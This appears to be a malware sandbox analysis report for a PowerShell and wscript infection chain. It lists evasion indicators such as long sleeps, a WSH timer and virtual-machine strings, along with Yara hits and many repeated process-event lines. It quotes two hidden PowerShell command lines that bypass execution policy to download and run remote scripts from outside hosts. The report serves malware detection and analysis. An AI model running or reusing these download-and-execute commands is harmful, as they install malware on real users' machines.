Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8186	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1704	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2415	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7344	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000010.00000002.1551108193.0000027EB5661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000011.00000002.1617422054.00000191692CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000E.00000002.1555837232.000001CBBD730000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7640.amsi.csv, type: OTHER
Source: Yara match	File source: dropped/chromecache_257, type: DROPPED

Bypasses PowerShell execution policy

Source: unknown

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\x.js			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=join-path $env:temp 'x.js';try{(new-object net.webclient).downloadfile($l,$p);start-process wscript -argumentlist '//nologo',$p -windowstyle hidden}catch{}"

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
